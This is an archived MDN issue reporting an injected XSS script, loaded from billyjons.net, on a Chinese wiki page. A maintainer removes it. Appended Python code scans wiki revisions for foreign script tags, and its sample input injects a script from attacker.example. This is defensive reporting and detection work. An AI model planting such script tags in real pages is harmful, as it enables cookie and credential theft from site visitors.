mdn / sprints

Archived: MDN Web Docs issues are tracked in the content repository.
https://github.com/mdn/content
Creative Commons Zero v1.0 Universal

Failed XSS Attempt at https://wiki.developer.mozilla.org/zh-CN/docs/MDN/Feedback #3456

Closed GalvinGao closed 4 years ago

GalvinGao commented 4 years ago

Request type

Details

There's code that seems to be a failed (not successful; not vulnerable to the user) XSS attempt in the zh-CN MDN wiki page Array.prototype.map(), specifically at https://wiki.developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Array/map#See_also . Please refer to the screenshot below.

[Screenshot: Snipaste_2020-07-02_00-28-46]

By checking the history records of the wiki page, it seems the change comes from Revision 1616575 (diff), which was committed by a user named Jayly.

Side Notes

I don't have much skill in analyzing malicious JavaScript, but by doing a quick search for cookie and http in the script billyjons.net/21db1c5c8b372aecca.js it seems that it is a real XSS script that might send information, including the browser's cookies, to the attacker, and may also collect other credentials. This behavior is quite uncommon and suspicious, so I decided to report it here ;)

Affected Page(s)

Elchi3 commented 4 years ago

Thanks! I removed the failed XSS attempt and banned the user.
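The kind of revision check that would have caught this edit before a reader had to, added here as an example and not code from MDN or its wiki platform. It parses a revision's HTML and flags any `<script>` whose `src` host is outside an assumed allowlist (`ALLOWED_SCRIPT_HOSTS` is an assumption), plus any inline script; the sample "See also" markup is constructed.

```python
"""Flag injected <script> tags in a wiki revision (added example, constructed input)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a wiki page is allowed to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"developer.mozilla.org"}


class _ScriptFinder(HTMLParser):
    """Collect (src, inline_body) for every <script> element in the markup."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._body = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._body = []

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive as raw data (CDATA)
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._body)))
            self._in_script = False


def scan_revision(html):
    """Return a list of findings; an empty list means no script injection seen."""
    parser = _ScriptFinder()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        if src:
            # Scheme-less "host/path.js" would parse as a path; force a host.
            host = urlparse(src if "//" in src else "//" + src).hostname or ""
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"external script from {host}")
        elif body.strip():
            findings.append("inline script")
    return findings


# Constructed sample: a "See also" list whose last item carries an injected tag.
SAMPLE_REVISION = (
    '<h2 id="See_also">See also</h2><ul>'
    '<li><a href="/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Array/forEach">'
    'Array.prototype.forEach()</a></li>'
    '<li><script src="https://attacker.example/payload.js"></script></li></ul>'
)
```

Running `scan_revision(SAMPLE_REVISION)` reports the external script; the same function returns an empty list for the list without the injected item.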